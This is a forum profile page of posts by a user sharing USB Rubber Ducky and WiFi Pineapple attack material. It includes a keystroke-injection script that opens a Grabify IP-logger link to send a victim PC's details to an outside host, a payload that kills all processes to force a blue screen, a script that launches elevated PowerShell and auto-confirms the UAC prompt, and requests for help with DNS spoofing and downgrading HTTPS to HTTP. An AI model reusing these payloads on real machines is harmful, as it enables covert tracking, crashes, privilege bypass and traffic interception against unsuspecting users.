
DarkN3ss
Active Members-
Content Count
11 -
Joined
-
Last visited
About DarkN3ss
-
Rank
Hackling
Profile Information
-
Gender
Male
Recent Profile Visitors
444 profile views
-
Hey guy so here is my 2nd payload. This simple script dumps your PC's info using a site called Grabify Simply head over to Grabify.link and create a link to Google.com. Once done turn on "Smart Logger" and copy the link it creates for you ("New URL") DELAY 2000 GUI r DELAY 500 STRING https://grabify.link/{YOURCODE} ENTER Replace {YOURCODE} with your code from your grabify link and you are done! To test it out, simply inset the USB Rubber Ducky into the PC. Give it a few seconds, once it loads the website you are done and you can unplug the device. Then go
-
Anyone have more information on this?
-
[Help]Enable https (port 443) for ebserver
DarkN3ss replied to DarkN3ss's topic in WiFi Pineapple Mark V
Yeah I figured it out a out 10 mi used after my last post haha I just forgot to update you here. My next question, is there a way so if the user goes to https://test.com that we can make it redirect to http://test.com since modern browsers won't give you access to the https site since its a self signed certificate? -
[Help]Enable https (port 443) for ebserver
DarkN3ss replied to DarkN3ss's topic in WiFi Pineapple Mark V
Anyone? help? I think it is something to do with nginx -
[Help]Enable https (port 443) for web server Hi I have just got my pineapple and i'm wanting to enable port 443 so when i do dns spoofing if a user goes to https://google.com/ it will still work instead of refusing the connection. I would love it if anyone here could tell me what to do. Thanks
-
ahh that sucks, well im glad they ship to New Zealand :D
-
you could use something like americanshipper and get it sent there, and then they ford it onto you in India
-
Hey so I have made a video demoing this So this causes a BSOD in 8 seconds!! and works on Windows 7 and 8 (NOT 8.1)
-
Hey guy so this is my first payload published on here (Sorry if its in the wrong place :P ). Anyway my payload causes the computer to crash to a Blue Screen How it works is by killing all the processes on the computer until it crashes to a BSOD. I have tested this on Windows 7 and 8/8.1 This should be reasonably safe, along as the user doesn't have any unsaved documents open. Feel free to tweak it and post tweaks here as I would like to see if it can be improved :)
-
Open windows start menu to search for program
DarkN3ss replied to DarkN3ss's topic in USB Rubber Ducky
I have found a fix, GUI r DELAY 500 STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 1500 ALT y -
Hello im trying to open the windows start menu to search for a program to open it as an administrator So far I have this GUI DELAY 400 string powershell CTRL-SHIFT ENTER But this wont open the start menu at all Any help? Because im not sure what I am doing wrong Thanks :)